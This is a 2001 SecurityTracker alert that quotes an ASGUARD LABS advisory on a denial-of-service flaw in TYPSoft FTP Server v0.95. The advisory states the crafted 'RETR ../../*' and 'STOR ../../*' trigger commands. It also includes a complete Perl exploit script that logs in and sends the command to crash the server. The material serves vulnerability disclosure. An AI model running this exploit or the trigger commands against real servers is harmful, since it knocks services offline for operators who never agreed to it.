TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users
|
|
SecurityTracker Alert ID: 1002519 |
|
SecurityTracker URL: http://securitytracker.com/id/1002519
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 10 2001
|
Impact:
Denial of service via network
|
Exploit Included: Yes
|
Version(s): v0.95; possibly earlier versions
|
Description:
ASGUARD LABS reported a denial of service vulnerability in TYPSoft's FTP Server. Remote users can cause the server to crash.
It is reported that if a remote user with access to the FTP service (including anonymous access) sends a specially crafted "STOR" or "RETR" command, the FTP server will consume nearly all CPU resources and will then crash.
Sending the following type of command will apparently trigger the vulnerability:
RETR ../../*
or,
STOR ../../*
Demonstration exploit code is included in the Source Message.
The vendor has reportedly been contacted.
|
Impact:
A remote user with access to the FTP service, including anonymous access, can issue a specially crafted command to cause the FTP Server to consume nearly all CPU resources and then crash.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.multimania.com/typsoft/ (Links to External Site)
|
Cause:
Exception handling error
|
Underlying OS:
Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 08 Oct 2001 14:05:00 +0200
Subject: [ASGUARD-LABS] TYPSoft FTP Server v0.95 STOR/RETR Denial of Service Vulnerability
|
--------------060104070007060104050607
Content-Type: text/plain;
name="typFTP095.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="typFTP095.txt"
-00 ASGUARD LABS ADVISORY 00-
:Summary:
Release Date : 2001-10-04
Affected : TYPSoft FTP Server v0.95
Not Affected : -
Attack Type : Denial Of Service
Credits to : Jan Wagner
:Description:
The TYPSoft FTP Server v0.95 contains a simple D.O.S. which affects the "RETR" and "STOR" Command.
:Detail:
If the Server receives a special formed "STOR" or "RETR" command it consumes about 99% CPU Power
and crashes. The Server must be restarted to operate aggain.
Tested on:
Windows 98se [german]
Windows 2000 SP1 [german]
:Exploit Code:
<typ095DOS.pl>
#!/usr/bin/perl
use IO::Socket;
use Socket;
print "-= ASGUARD LABS EXPLOIT - TYPSoft FTP Server v0.95 =-\n\n";
if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typ095DOS.pl <host> <user>
<pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };
$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err = "RETR ../../*";
#Both works "STOR" and "RETR"
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: can't connect to $adr:$prt\n";
$remote->autoflush(1);
print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: can't send user\n";
print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: can't send pass\n";
print $remote "$err/\n" and print "3. Sending : ErrorCode...\n\n"or die
"Error: can't send error code\n";
print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;
:Solution:
(still) waiting for TYPsoft statement...
--------------060104070007060104050607--
|
|
